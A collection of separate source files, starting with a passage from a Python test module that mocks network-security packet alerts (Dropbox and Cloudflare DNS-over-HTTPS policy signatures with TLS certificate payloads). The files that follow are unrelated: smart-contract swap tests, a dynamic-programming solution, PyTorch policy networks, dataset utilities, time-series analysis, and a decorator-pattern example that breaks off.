"managed_info": {
"host_name": "DESKTOP-73OV7ML"
}
}
},
"payload": """....C...?..^lH.....b.R.]...?..J..~.^....Lr1...........
.........#.......................0...0...........1.{....d.....\rR0\r
..*.H..\r.....0p1.0...U....US1.0...U.\n..Example Inc1.0...U....www.e
xample.com1/0-..U...&Example SHA2 High Assurance Server CA0..\r18081
6000000Z.\r201105120000Z0.1.0...U....US1.0...U...\nCalifornia1.0...U
...\rSan Francisco1.0...U.\n..Dropbox, Inc1.0...U....Dropbox Ops1.0.
..U...\r*.dropbox.com0..\"0\r..*.H..\r..........0..\n......1.$.#.jJ.
.ZQ.6..ku47kS..i.\r<.9...\r3...v.(.....Q..7.\n{.....$.i.i...^1.g.A.)
k......!Qq=.4.O:8k.+.(.-....-F1.U.9?|....I.....M..IA\n.I>.....'1....
.....:]:.I.d..nn.7.g\".b11.....8.EJS5....1u..6x...x....q\n@.~...I!..
.{~.u.nGk...CGr..^.y..l#...<x&V........J<.7..J..........v0..r0...U.#
..0...Qh.....u<..edb...Yr;0...U.......|...Xu3.z.R.RU..n8.0%..U....0.
.\r*.dropbox.com..dropbox.com0...U...........0...U.%..0...+.........
+.......0u..U...n0l04.2.0..http://crl3.example.com/sha2-ha-server-g6
.crl04.2.0..http://crl4.example.com/sha2-ha-server-g6.crl0L..U. .E0C
07..`.H...l..0*0(..+.........https://www.example.com/CPS0...g.....0.
...+........w0u0$..+.....0...http://ocsp.example.com0M..+.....0..Aht
tp://cacerts.example.com/ExampleSHA2HighAssuranceServerCA.crt0...U..
.....0.0....\n+.....y......o...k.i.w.......X......gp\n<5.......w...\
r.....eC.s......H0F.!..Hv..,O._rd....g.C*......V..cw.e.!..6.-.......
..K<A\".[..=.........1.w..u..Y|..C._..n.V.GV6.J.`....^......eC.t....
..H0F.!..`.;.(,&.u.B.$S(...3..B#...X4....!.....X[.DPQ..YhW.....j...8
./\n.6...u.......q...#...{G8W.\n.R....d6.......eC.t......F0D. v.y7Gs
.6Z..7(&(z..+t...w....tay.. _..6i........}6$...D..?7........0\r..*.H
..\r..........\r\"..R..IP..i.l...5.d..m.X.h#........9..T<...@...B.r.
BK #...$..z/.. u....~I.r...._..{.0|12G..2.!...{...Z..C.. 7.....>...\
n(F^..Y..z.H6..`9.....\\..\r{.[n2....I..........P.....+....~.......=
.....p...b.`FpRr.E..u..s..TG...._..n.........|..Km..$/u..;rHLe....<.
g.U...0...0...............\\..m.+B.]..0\r..*.H..\r.....0l1.0...U....
US1.0...U.\n..Example Inc1.0...U....www.example.com1+0)..U...\"Examp
le High Assurance EV Root CA0..\r131022120000Z.\r281022120000Z0p1.0.
..U....US1.0...U.\n..Example Inc1.0...U....www.example.com1/0-..U...
&Example SHA2 High Assurance Server CA0..\"0\r..*.H..\r..........0..
\n......./.$..m._..\nd..}\"&e..B@.....v.>.0U...O..Z..UV...*.....@...
;r............C:.......@....M._W..Ph................-..........^DX*7
..5...'2Z......Q.'..;B3..(..(...+#\rx.{.^q.J>........#.M.....u......
.D5e.S%9..\n.c...th\n7..RH.9Z...]... .!..&o.J!A..m..H/....h.S/^.....
....I0..E0...U.......0.......0...U...........0...U.%..0...+.........
+.......04..+........(0&0$..+.....0...http://ocsp.example.com0K..U..
.D0B0@.>.<.:http://crl4.example.com/ExampleHighAssuranceEVRootCA.crl
0=..U. .60402..U. .0*0(..+.........https://www.example.com/CPS0...U.
.....Qh.....u<..edb...Yr;0...U.#..0....>.i...G...&....cd+.0\r..*.H..
\r................m.\\..h.J...Q/.kD...c..nl.....q.[.4N..y.).-.j.. .y
...G.....Yq}...k.YX=..1%\\.8.......[.1N.x.....I..'..r.>..A...6...nGI
.^.H|....I..&B@.....d\nWT.....^k......r.V....0..0...N.W..$...+..u..-
..}y'............ (AYC(......{;redacted>..3.g.a.r..i...W@.p........*
...&... P..y&.U......0.....],..i...E.1@{...........\n...J.c32NO...j.
.'S7.N.in..,Q..[..~..eI#.w.O5./....G.M:..z.*..;`-....s'A.<Ce.;5\rE!.
(..\ng|TY.\r..RX..Db.,*.~...D...`...:Om....Pr6..(w@....w..$.GB7.Um..
.......X5....b......y).......C..2...../.W#.....Z....h\r..C....5^....
........AZ.....tw...).L..8b.............""",
"http": "null",
"type": "pkt_alert",
"group": "alert",
"subtype": "policy-violation",
"title": "User Activity Detected",
"description": "ET POLICY Dropbox.com Offsite File Backup in Use",
"references": [
"www.dropbox.com",
"dereknewton.com/2011/04/dropbox-authentication-static-host-ids/"
]
},
{
"id": "<KEY>
"address": "7c:67:a2:37:77:51",
"timestamp": "2020-03-13T23:46:14Z",
"severity": "info",
"category": "User Activity Detected",
"signature": "ET POLICY Dropbox.com Offsite File Backup in Use",
"source": {
"city": "San Francisco",
"continent": "North America",
"country": "United States",
"ip": "4.4.4.4",
"latitude": 37.7697,
"longitude": -122.3933,
"mac": "c4:24:56:87:ef:11",
"network": "external",
"port": 443,
"state": "California",
"subnet": "",
"time_zone": "America/Los_Angeles",
"zip": "94107",
"inferred": {
"device_id": "",
"asset": "unmanaged",
"managed": "false",
"category": "",
"control": "",
"host_name": "",
"os": "",
"os_version": "",
"ownership": "",
"total_risk": 0,
"type": "",
"username": "",
"managed_info": {
"host_name": ""
}
}
},
"destination": {
"city": "Unknown",
"continent": "Unknown",
"country": "Unknown",
"ip": "2.2.2.2",
"latitude": -1,
"longitude": -1,
"mac": "7c:67:a2:37:77:51",
"network": "internal",
"port": 54131,
"state": "Unknown",
"subnet": "10.10.10.10/24",
"time_zone": "Unknown",
"zip": "Unknown",
"inferred": {
"device_id": "5b589f43e4b58d191f7e017c",
"asset": "managed",
"managed": "true",
"category": "computer",
"control": "user",
"host_name": "DESKTOP-73OV7ML",
"os": "windows",
"os_version": "10",
"ownership": "corporate",
"total_risk": 11.9,
"type": "computer",
"username": "7c67a2377751",
"managed_info": {
"host_name": "DESKTOP-73OV7ML"
}
}
},
"payload": """....C...?..^l.Fy.5.7.k..t..............:..............
.........#.......................0...0...........1.{....d.....\rR0\r
..*.H..\r.....0p1.0...U....US1.0...U.\n..Example Inc1.0...U....www.e
xample.com1/0-..U...&Example SHA2 High Assurance Server CA0..\r18081
6000000Z.\r201105120000Z0.1.0...U....US1.0...U...\nCalifornia1.0...U
...\rSan Francisco1.0...U.\n..Dropbox, Inc1.0...U....Dropbox Ops1.0.
..U...\r*.dropbox.com0..\"0\r..*.H..\r..........0..\n......1.$.#.jJ.
.ZQ.6..ku47kS..i.\r<.9...\r3...v.(.....Q..7.\n{.....$.i.i...^1.g.A.)
k......!Qq=.4.O:8k.+.(.-....-F1.U.9?|....I.....M..IA\n.I>.....'1....
.....:]:.I.d..nn.7.g\".b11.....8.EJS5....1u..6x...x....q\n@.~...I!..
.{~.u.nGk...CGr..^.y..l#...<x&V........J<.7..J..........v0..r0...U.#
..0...Qh.....u<..edb...Yr;0...U.......|...Xu3.z.R.RU..n8.0%..U....0.
.\r*.dropbox.com..dropbox.com0...U...........0...U.%..0...+.........
+.......0u..U...n0l04.2.0..http://crl3.example.com/sha2-ha-server-g6
.crl04.2.0..http://crl4.example.com/sha2-ha-server-g6.crl0L..U. .E0C
07..`.H...l..0*0(..+.........https://www.example.com/CPS0...g.....0.
...+........w0u0$..+.....0...http://ocsp.example.com0M..+.....0..Aht
tp://cacerts.example.com/ExampleSHA2HighAssuranceServerCA.crt0...U..
.....0.0....\n+.....y......o...k.i.w.......X......gp\n<5.......w...\
r.....eC.s......H0F.!..Hv..,O._rd....g.C*......V..cw.e.!..6.-.......
..K<A\".[..=.........1.w..u..Y|..C._..n.V.GV6.J.`....^......eC.t....
..H0F.!..`.;.(,&.u.B.$S(...3..B#...X4....!.....X[.DPQ..YhW.....j...8
./\n.6...u.......q...#...{G8W.\n.R....d6.......eC.t......F0D. v.y7Gs
.6Z..7(&(z..+t...w....tay.. _..6i........}6$...D..?7........0\r..*.H
..\r..........\r\"..R..IP..i.l...5.d..m.X.h#........9..T<...@...B.r.
BK #...$..z/.. u....~I.r...._..{.0|12G..2.!...{...Z..C.. 7.....>...\
n(F^..Y..z.H6..`9.....\\..\r{.[n2....I..........P.....+....~.......=
.....p...b.`FpRr.E..u..s..TG...._..n.........|..Km..$/u..;rHLe....<.
g.U...0...0...............\\..m.+B.]..0\r..*.H..\r.....0l1.0...U....
US1.0...U.\n..Example Inc1.0...U....www.example.com1+0)..U...\"Examp
le High Assurance EV Root CA0..\r131022120000Z.\r281022120000Z0p1.0.
..U....US1.0...U.\n..Example Inc1.0...U....www.example.com1/0-..U...
&Example SHA2 High Assurance Server CA0..\"0\r..*.H..\r..........0..
\n......./.$..m._..\nd..}\"&e..B@.....v.>.0U...O..Z..UV...*.....@...
;r............C:.......@....M._W..Ph................-..........^DX*7
..5...'2Z......Q.'..;B3..(..(...+#\rx.{.^q.J>........#.M.....u......
.D5e.S%9..\n.c...th\n7..RH.9Z...]... .!..&o.J!A..m..H/....h.S/^.....
....I0..E0...U.......0.......0...U...........0...U.%..0...+.........
+.......04..+........(0&0$..+.....0...http://ocsp.example.com0K..U..
.D0B0@.>.<.:http://crl4.example.com/ExampleHighAssuranceEVRootCA.crl
0=..U. .60402..U. .0*0(..+.........https://www.example.com/CPS0...U.
.....Qh.....u<..edb...Yr;0...U.#..0....>.i...G...&....cd+.0\r..*.H..
\r................m.\\..h.J...Q/.kD...c..nl.....q.[.4N..y.).-.j.. .y
...G.....Yq}...k.YX=..1%\\.8.......[.1N.x.....I..'..r.>..A...6...nGI
.^.H|....I..&B@.....d\nWT.....^k......r.V....0..0...N.W..$...+..u..-
..}y'............ (AYC(......{;redacted>..3.g.a.r..i...W@.p........*
...&... .wf.\n$2..[..@&km...7m...~.B.......@8^.t.,..;.;...D..2..G'..
.G\"...=..E\\..44.........J.R+....Ms.c.w......%J.(K.gl.;\\.....Um..Z
....kR)...m[...N..k...&..D<.Y.\".....K...\n.......J.&.S{rX...5.H...#
>.`8-G....7..s..@...q^... .Y.....*dHW......:.....7..|.(...O..c.r^..I
ct..........5......x...G...\\h.B..........""",
"http": "null",
"type": "pkt_alert",
"group": "alert",
"subtype": "policy-violation",
"title": "User Activity Detected",
"description": "ET POLICY Dropbox.com Offsite File Backup in Use",
"references": [
"www.dropbox.com",
"dereknewton.com/2011/04/dropbox-authentication-static-host-ids/"
]
},
{
"id": "<KEY>",
"address": "34:f6:4b:b9:97:4a",
"timestamp": "2020-03-13T22:14:32Z",
"severity": "medium",
"category": "User Activity Detected",
"signature": "ET POLICY Cloudflare DNS Over HTTPS Certificate Inbound",
"source": {
"city": "Unknown",
"continent": "North America",
"country": "United States",
"ip": "192.168.3.11",
"latitude": 37.751,
"longitude": -97.822,
"mac": "c4:24:56:87:ef:11",
"network": "external",
"port": 443,
"state": "Unknown",
"subnet": "",
"time_zone": "Unknown",
"zip": "Unknown",
"inferred": {
"device_id": "",
"asset": "unmanaged",
"managed": "false",
"category": "",
"control": "",
"host_name": "",
"os": "",
"os_version": "",
"ownership": "",
"total_risk": 0,
"type": "",
"username": "",
"managed_info": {
"host_name": ""
}
}
},
"destination": {
"city": "Unknown",
"continent": "Unknown",
"country": "Unknown",
"ip": "4.4.4.4",
"latitude": -1,
"longitude": -1,
"mac": "34:f6:4b:b9:97:4a",
"network": "internal",
"port": 56402,
"state": "Unknown",
"subnet": "10.10.10.10/24",
"time_zone": "Unknown",
"zip": "Unknown",
"inferred": {
"device_id": "5a0b2a3eccd47205deb12fb3",
"asset": "managed",
"managed": "true",
"category": "computer",
"control": "user",
"host_name": "DESKTOP-BEJRPN4",
"os": "windows",
"os_version": "10",
"ownership": "corporate",
"total_risk": 0.11,
"type": "computer",
"username": "sakella",
"managed_info": {
"host_name": "DESKTOP-BEJRPN4"
}
}
},
"payload": """....L...H..^l....?B....e....I.BP...DOWNGRD...+.. .....
...............#.........h2...............0...0..L.............V..+$
.....0\n..*.H.=...0L1.0...U....US1.0...U.\n..Example Inc1&0$..U....E
xample ECC Secure Server CA0..\r190128000000Z.\r210201120000Z0r1.0..
.U....US1.0...U...\nCalifornia1.0...U...\rSan Francisco1.0...U.\n..C
loudflare, Inc.1.0...U....cloudflare-dns.com0Y0...*.H.=....*.H.=....
B... p. BP(.}DA|0y).c^.D...q:+.....l=j.w....PS...&.a7......].~....t.
...0...0...U.#..0.........9O.n......1.\n.0...U......p..\\..f........
..E..0....U.....0....cloudflare-dns.com..*.cloudflare-dns.com..one.o
ne.one.one.................5..&.G.G.............&.G.G.............&.
G.G..........d..&.G.G.........d.....$.......0...U...........0...U.%.
.0...+.........+.......0i..U...b0`0..,.*.(http://crl3.example.com/ss
ca-ecc-g1.crl0..,.*.(http://crl4.example.com/ssca-ecc-g1.crl0L..U. .
E0C07..`.H...l..0*0(..+.........https://www.example.com/CPS0...g....
.0{..+........o0m0$..+.....0...http://ocsp.example.com0E..+.....0..9
http://cacerts.example.com/ExampleECCSecureServerCA.crt0...U.......0
.0..~.\n+.....y......n...j.h.v.......X......gp\n<5.......w...\r.....
h.........G0E.!.....1{E..2.[4z......Mq...t.fA1H.. p...T..l..g..6I...
.F....o....1.J.u..u..Y|..C._..n.V.GV6.J.`....^......h...l.....F0D. P
..BL......B'1w.e..;..?.M#..\\.... ...'..b2...Ht.d. .Mn&.3...E..C...w
.......q...#...{G8W.\n.R....d6.......h.........H0F.!...=0s9.R......0
...!P...L....Sp...!....?=?.Aq..;..\nv...]a.#.3f.c....0\n..*.H.=....h
.0e.0{>..}.L.....F..vehk.zeQ.....N...{.^.4.>.......U..1..G.....';.X.
.p.,.:p.Vo7.....?...^ ..c8.O@.m........0...0..........\n.(.F^.9.vtp.
...0\r..*.H..\r.....0a1.0...U....US1.0...U.\n..Example Inc1.0...U...
.www.example.com1 0...U....Example Global Root CA0..\r130308120000Z.
\r230308120000Z0L1.0...U....US1.0...U.\n..Example Inc1&0$..U....Exam
ple ECC Secure Server CA0v0...*.H.=....+...\".b....B.w.$..,d...@.#r.
.\n.7?!6..S.....K....q......^....Z...So...?..[?G$......./.W..q..x:..
[<kd.+.4+....!0...0...U.......0.......0...U...........04..+........(
0&0$..+.....0...http://ocsp.example.com0B..U...;0907.5.3.1http://crl
3.example.com/ExampleGlobalRootCA.crl0=..U. .60402..U. .0*0(..+.....
....https://www.example.com/CPS0...U............9O.n......1.\n.0...U
.#..0.....P5V.L.f........=.U0\r..*.H..\r.............CK.t.....056n.V
{H..c.{.W$W.o...m........sd...7\n.I.?.&... ....*.f7.0...$.EH-..PJ1..
.._.*.I<a.y..f...*.{6X.,A.t...H.....Eq3.0zz.!.$..........j.w.5...'d.
C...wV....G.._(..hL..`...y.jv&... ..>.z(edf.....t.nM}........N..U..8
.4...?..Oj.t./*.s._..C.l.}...\".O..w....s...o... ...i)..8.I.bD.....q
<...].......S...G0E. p....#..u.._l.>..3xb.FV......{...!........\"...
...{_&k.d....!...n..#.........""",
"http": "null",
"type": "pkt_alert",
"group": "alert",
"subtype": "policy-violation",
"title": "User Activity Detected",
"description": "ET POLICY Cloudflare DNS Over HTTPS Certificate Inbound",
"references": [
"developers.cloudflare.com/1.1.1.1/dns-over-https/request-structure/"
]
}
]
}
def test_first_fetch_incidents(requests_mock, mocker):
client = Client(MOCK_URL + '/v1/', verify=True, headers=MOCK_HEADERS, auth=('test_user', 'test123'))
requests_mock.post(MOCK_URL + '/v1/events/packetalerts', json=FETCH_ALERTS)
fetch_incidents(client, 'packet')
def test_fetch_single_alert(requests_mock):
ID = 'eyJpIjoiU05XT09UQVBQUFJPRDAxXzEzMzIxNThfMDAwIiwidCI6IjIwMTktMDYtMjZUMjA6MjQ6MjZaIn0='
requests_mock.get(MOCK_URL + '/v1/events/packetalerts/' + ID, json=MOCK_PKT_ALERT)
client = Client(MOCK_URL + '/v1/', verify=True, headers=MOCK_HEADERS, auth=('test_user', 'test123'))
alert_type = "packet"
assert MOCK_PKT_ALERT == fetch_single_alert(client, ID, alert_type).raw_response
def test_get_woot_alerts(requests_mock):
client = Client(MOCK_URL + '/v1/', verify=True, headers=MOCK_HEADERS, auth=('test_user', 'test123'))
requests_mock.post(MOCK_URL + '/v1/events/anomalies', json=ANOMALY_ALERT)
assert ANOMALY_ALERT == client.get_woot_alerts('anomaly', MOCK_START, MOCK_END, limit='1').raw_response
|
11481887
|
from geoana.em.fdem.base import (
omega, wavenumber, skin_depth, sigma_hat, BaseFDEM
)
from geoana.em.fdem.wholespace import (
ElectricDipoleWholeSpace, MagneticDipoleWholeSpace
)
from geoana.em.fdem.halfspace import MagneticDipoleHalfSpace
from geoana.em.fdem.layered import MagneticDipoleLayeredHalfSpace
from geoana.em.fdem.simple_functions import (
vertical_magnetic_field_horizontal_loop, vertical_magnetic_flux_horizontal_loop
)
|
11481927
|
import brownie
import pytest
@pytest.fixture(scope="module")
def token_id(settler_sbtc):
return int(settler_sbtc.address, 16)
@pytest.fixture(scope="module", autouse=True)
def setup(alice, bob, swap, DAI, USDT, add_synths):
DAI._mint_for_testing(alice, 1_000_000 * 10 ** 18)
DAI.approve(swap, 2 ** 256 - 1, {"from": alice})
USDT._mint_for_testing(bob, 1_000_000 * 10 ** 6)
USDT.approve(swap, 2 ** 256 - 1, {"from": bob})
def test_swap_into_existing_increases_balance(
swap, alice, DAI, sUSD, sBTC, settler_sbtc, token_id
):
initial = sBTC.balanceOf(settler_sbtc)
amount = 1_000_000 * 10 ** 18
expected = swap.get_swap_into_synth_amount(DAI, sBTC, amount)
swap.swap_into_synth(DAI, sBTC, amount, 0, alice, token_id, {"from": alice})
assert DAI.balanceOf(alice) == 0
assert DAI.balanceOf(swap) == 0
assert DAI.balanceOf(settler_sbtc) == 0
assert sUSD.balanceOf(alice) == 0
assert sUSD.balanceOf(swap) == 0
assert sUSD.balanceOf(settler_sbtc) == 0
assert sBTC.balanceOf(alice) == 0
assert sBTC.balanceOf(swap) == 0
assert sBTC.balanceOf(settler_sbtc) == expected + initial
def test_swap_into_existing_does_not_mint(swap, alice, DAI, sBTC, token_id):
amount = 1_000_000 * 10 ** 18
tx = swap.swap_into_synth(DAI, sBTC, amount, 0, alice, token_id, {"from": alice})
new_token_id = tx.return_value
assert not tx.new_contracts
assert new_token_id == token_id
assert swap.balanceOf(alice) == 1
def test_only_owner(swap, alice, bob, DAI, sBTC, token_id):
amount = 1_000_000 * 10 ** 18
with brownie.reverts("Caller is not owner or operator"):
swap.swap_into_synth(DAI, sBTC, amount, 0, bob, token_id, {"from": bob})
def test_wrong_receiver(swap, alice, bob, DAI, sBTC, token_id):
amount = 1_000_000 * 10 ** 18
with brownie.reverts("Receiver is not owner"):
swap.swap_into_synth(DAI, sBTC, amount, 0, bob, token_id, {"from": alice})
def test_wrong_synth(swap, alice, DAI, sETH, token_id):
amount = 1_000_000 * 10 ** 18
with brownie.reverts("Incorrect synth for Token ID"):
swap.swap_into_synth(DAI, sETH, amount, 0, alice, token_id, {"from": alice})
def test_cannot_add_after_burn(chain, swap, alice, token_id, DAI, sBTC):
chain.mine(timedelta=600)
balance = swap.token_info(token_id)["underlying_balance"]
swap.withdraw(token_id, balance, {"from": alice})
with brownie.reverts("Unknown Token ID"):
swap.swap_into_synth(DAI, sBTC, 10 ** 18, 0, alice, token_id, {"from": alice})
def test_approved_operator(swap, alice, bob, USDT, sBTC, token_id):
amount = 1_000_000 * 10 ** 6
swap.setApprovalForAll(bob, True, {"from": alice})
swap.swap_into_synth(USDT, sBTC, amount, 0, alice, token_id, {"from": bob})
def test_approved_one_token_operator(swap, alice, bob, USDT, sBTC, token_id):
amount = 1_000_000 * 10 ** 6
swap.approve(bob, token_id, {"from": alice})
swap.swap_into_synth(USDT, sBTC, amount, 0, alice, token_id, {"from": bob})
|
11481973
|
class Solution:
def minCost(self, costs: List[List[int]]) -> int:
if not costs:
return 0
for i in range(1, len(costs)):
costs[i][0] += min(costs[i - 1][1], costs[i - 1][2])
costs[i][1] += min(costs[i - 1][0], costs[i - 1][2])
costs[i][2] += min(costs[i - 1][0], costs[i - 1][1])
return min(costs[-1])
|
11481983
|
import torch.nn as nn
import torch.nn.functional as F
import torch
from parlai.agents.hy_lib.common_modules import FeedForward
class PolicyNet(nn.Module):
def __init__(self, state_dim, action_dim):
super().__init__()
self.policy = FeedForward(state_dim, action_dim, hidden_sizes=(128, 64))
def forward(self, state):
action_score = self.policy(state)
action_prob = F.softmax(action_score, dim=-1)
return action_prob
class CriticNet(nn.Module):
def __init__(self, state_dim, action_dim):
super().__init__()
self.critic = FeedForward(state_dim + action_dim, 1, hidden_sizes=(128, 64))
def forward(self, state_actions):
val = self.critic(state_actions)
return val
|
11482015
|
from .body_class import BodyClass
class PyramidClass(BodyClass):
def __init__(self, S_main, S_back, h):
# S_main - площадь основания пирамиды
# S_back - площадь боковой поверхности
# h - высота пирамиды
self.S_main = S_main
self.S_back = S_back
self.h = h
self.volume_calculation()
self.surface_area_calculation()
def surface_area_calculation(self):
self.surface_area = self.S_main + 4 * self.S_back
def volume_calculation(self):
self.volume = (1 / 3) * self.S_main * self.h
|
11482033
|
from setuptools import setup
setup(name="audino", version="0.1.0", packages=["audino"], include_package_data=True)
|
11482038
|
from __future__ import division
import random
import numpy as np
from PIL import Image
import torchvision.transforms as transforms
from . import co_transforms
def has_file_allowed_extension(filename, extensions):
"""Checks if a file is an allowed extension.
Args:
filename (string): path to a file
extensions (iterable of strings): extensions to consider (lowercase)
Returns:
bool: True if the filename ends with one of given extensions
"""
filename_lower = filename.lower()
return any(filename_lower.endswith(ext) for ext in extensions)
def is_image_file(filename):
"""Checks if a file is an allowed image extension.
Args:
filename (string): path to a file
Returns:
bool: True if the filename ends with a known image extension
"""
return has_file_allowed_extension(filename, IMG_EXTENSIONS)
def make_dataset(image_paths, class_idxs, extensions):
assert len(image_paths) == len(class_idxs)
images = []
for i, fp in enumerate(image_paths):
if has_file_allowed_extension(fp, extensions):
item = (fp, class_idxs[i])
images.append(item)
return images
def pil_loader(path):
# open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert('RGB')
def accimage_loader(path):
import accimage
try:
return accimage.Image(path)
except IOError:
# Potentially a decoding problem, fall back to PIL.Image
return pil_loader(path)
def default_loader(path):
from torchvision import get_image_backend
if get_image_backend() == 'accimage':
return accimage_loader(path)
else:
return pil_loader(path)
def get_sample_index(f_n, K, snippet_len, stride=1):
assert f_n > 0
snippet_len = snippet_len * stride
if f_n >= K * snippet_len:
avg_len = f_n // K
begin_idx = np.multiply(list(range(K)), avg_len) + np.random.randint(avg_len - snippet_len + 1)
idx_list = [list(range(bi, bi + snippet_len)) for bi in begin_idx]
elif f_n >= K:
sp_ind = np.array_split(range(f_n), K)
sp_ind = [list(sp) for sp in sp_ind]
idx_list = [lst + [lst[-1]] * (snippet_len - len(lst)) for lst in sp_ind]
else:
idx_list = np.sort(np.random.randint(f_n, size=K * snippet_len))
sp_ind = np.array_split(idx_list, K)
idx_list = [list(sp) for sp in sp_ind]
if stride > 1:
idx_list = [ind[::stride] for ind in idx_list]
return idx_list
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
################## Get transforms ############################
class StaticRandomCrop(object):
def __init__(self, image_size, crop_size):
self.th, self.tw = crop_size
h, w = image_size
self.h1 = random.randint(0, h - self.th)
self.w1 = random.randint(0, w - self.tw)
def __call__(self, img):
return img[self.h1:(self.h1 + self.th), self.w1:(self.w1 + self.tw), :]
class StaticCenterCrop(object):
def __init__(self, image_size, crop_size):
self.th, self.tw = crop_size
self.h, self.w = image_size
def __call__(self, img):
return img[(self.h - self.th) // 2:(self.h + self.th) // 2, (self.w - self.tw) // 2:(self.w + self.tw) // 2, :]
"""
def get_transform(trans_size, is_train=True, sparse=False, div_flow=20.0, cr_rate=0.1,
val_full=False, fix_size=[256, 320], pre_scal_size=256):
input_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0, 0], std=[255, 255, 255]),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # Changeed for vgg usage
])
target_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0], std=[div_flow, div_flow])
])
if is_train:
com_transform = co_transforms.Compose([
co_transforms.SmallEdgeScale(pre_scal_size),
co_transforms.RandomCropResize(trans_size, cr_rate),
# co_transforms.RandomVerticalFlip(),
co_transforms.RandomHorizontalFlip()
])
else:
com_transform = co_transforms.Compose([
co_transforms.FixSizeScale(fix_size) if val_full else co_transforms.CenterCrop(trans_size)
])
return input_transform, target_transform, com_transform
"""
def get_transform_flow(trans_size, is_train=True, sparse=False, div_flow=1.0, ct_type='1'):
input_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0, 0], std=[255, 255, 255]),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
"""
if ct_type == '1':
input_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0, 0], std=[255, 255, 255]),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
])
elif ct_type=='2':
input_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0, 0], std=[255, 255, 255]),
])
"""
target_transform = transforms.Compose([
co_transforms.ArrayToTensor(),
transforms.Normalize(mean=[0, 0], std=[div_flow, div_flow])
])
if is_train:
ct = []
if ct_type == '1' and not sparse:
ct.append(co_transforms.RandomCropResize(trans_size, 0.2))
else:
ct.append(co_transforms.RandomCrop(trans_size))
ct.append(co_transforms.RandomHorizontalFlip())
if ct_type != '3':
ct.append(co_transforms.RandomVerticalFlip())
com_transform = co_transforms.Compose(ct)
else:
ct = []
if ct_type == '1' and not sparse:
ct.append(co_transforms.FixSizeScale(trans_size))
else:
ct.append(co_transforms.CenterCrop(trans_size))
com_transform = co_transforms.Compose(ct)
return input_transform, target_transform, com_transform
|
11482123
|
import matplotlib.pyplot as plt
import numpy as np
import statsmodels.api as sm
import streamlit as st
def find_acf_pacf(timeseries, seasonality):
'''
Function to find the amount of terms for p and q
Args.
timeseries (Pandas Series): a time series to estimate the p and q terms
seasonality (int): the seasonality is used to estimate the amount of lags to consider. By default, this function will use seasonality * 2 lags
to compute ACF and PACF
'''
fig = plt.figure(figsize=(10,5))
ax1 = plt.subplot(211)
ax2 = plt.subplot(212)
p_terms = 0
q_terms = 0
P_terms = 0
Q_terms = 0
lower_conf_int = -1.96/np.sqrt(len(timeseries.dropna()))
upper_conf_int = 1.96/np.sqrt(len(timeseries.dropna()))
pacf_values = sm.tsa.stattools.pacf(timeseries.dropna(), nlags = seasonality * 2, method='ywunbiased')
acf_values = sm.tsa.stattools.acf(timeseries.dropna(), nlags = seasonality * 2, fft=False, unbiased=False)
#st.write(pacf_values, lower_conf_int)
# Checking for p terms
for value in pacf_values[1:]:
if value >= upper_conf_int or value <= lower_conf_int:
p_terms += 1
else:
break
# Checking for q terms
for value in acf_values[1:]:
if value >= upper_conf_int or value <= lower_conf_int:
q_terms += 1
else:
break
# Checking for P terms
if pacf_values[seasonality] >= upper_conf_int or pacf_values[seasonality] <= lower_conf_int:
P_terms += 1
if pacf_values[seasonality*2] >= upper_conf_int or pacf_values[seasonality*2] <= lower_conf_int:
P_terms += 1
# Checking for Q terms
if acf_values[seasonality] >= upper_conf_int or acf_values[seasonality] <= lower_conf_int:
Q_terms += 1
if acf_values[seasonality*2] >= upper_conf_int or acf_values[seasonality*2] <= lower_conf_int:
Q_terms += 1
# Ploting the ACF function
sm.graphics.tsa.plot_acf(timeseries.dropna(), lags = seasonality * 2, ax=ax1, color='green')
# Ploting the PACF function
sm.graphics.tsa.plot_pacf(timeseries.dropna(), lags = seasonality * 2, ax=ax2, color='green')
plt.subplots_adjust(hspace=.4)
st.pyplot()
return p_terms, q_terms, P_terms, Q_terms
|
11482140
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.brambles import brambles
def test_brambles():
"""Test module brambles.py by downloading
brambles.csv and testing shape of
extracted data has 823 rows and 3 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = brambles(test_path)
try:
assert x_train.shape == (823, 3)
except:
shutil.rmtree(test_path)
raise()
|
11482156
|
import abc
#Clase Abstracta de Café, todos las clases de café tienen que tener esta estructura
class CafeAbstracto(metaclass=abc.ABCMeta):
def precio(self):
pass
def ingredientes(self):
pass
#Tipo de Café que implementa la clase abstacta
class CafeSimple(CafeAbstracto):
def precio(self):
return 25
def ingredientes(self):
return 'Cafesito!'
#Clase Abstracta de Decorador para todos los decoradores o ingredientes
class Abstracto_Cafe_Decorator(CafeAbstracto,metaclass=abc.ABCMeta):
def __init__(self,decorated_cafe):
self.decorated_cafe = decorated_cafe
def precio(self):
return self.decorated_cafe.precio()
def ingredientes(self):
return self.decorated_cafe.ingredientes()
#Tipo de Decorador o ingrediente implementa la clase abtsracta de Decorador
class Canela(Abstracto_Cafe_Decorator):
def __init__(self,decorated_cafe):
Abstracto_Cafe_Decorator.__init__(self,decorated_cafe)
def precio(self):
return self.decorated_cafe.precio() + 5
def ingredientes(self):
return self.decorated_cafe.ingredientes() + ', con canela!'
class Leche(Abstracto_Cafe_Decorator):
def __init__(self,decorated_cafe):
Abstracto_Cafe_Decorator.__init__(self,decorated_cafe)
def precio(self):
return self.decorated_cafe.precio() + 3
def ingredientes(self):
return self.decorated_cafe.ingredientes() + ', con leche!'
class Vainilla(Abstracto_Cafe_Decorator):
def __init__(self,decorated_cafe):
Abstracto_Cafe_Decorator.__init__(self,decorated_cafe)
def get_cost(self):
return self.decorated_cafe.precio() + 7
def ingredientes(self):
